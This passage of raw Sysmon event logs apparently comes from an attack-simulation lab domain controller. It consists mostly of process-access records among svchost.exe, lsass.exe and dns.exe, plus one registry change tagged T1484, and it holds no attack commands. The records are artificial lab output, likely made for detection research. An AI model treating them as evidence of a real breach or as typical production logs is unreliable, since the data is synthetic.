dll.dll+51791 10341000x80000000000000002585Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.768{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002584Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.768{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002583Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.768{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002582Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.768{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002581Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.768{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002580Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.768{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002579Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.768{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002578Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.768{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002577Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localT1484SetValue2020-11-03 15:51:43.737{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\MaxNoGPOListChangesIntervalDWORD (0x000003c0) 10341000x80000000000000002576Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.722{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-3400-000000008801}2168C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002575Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.706{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-3400-000000008801}2168C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002574Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.706{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-3400-000000008801}2168C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002573Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.690{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002572Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.690{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002571Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.690{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002570Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.675{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-3400-000000008801}2168C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002569Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.597{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002568Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.597{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002567Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.597{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002566Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.597{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002565Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.597{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002564Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.597{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002563Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.581{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002562Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.581{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002561Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.581{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\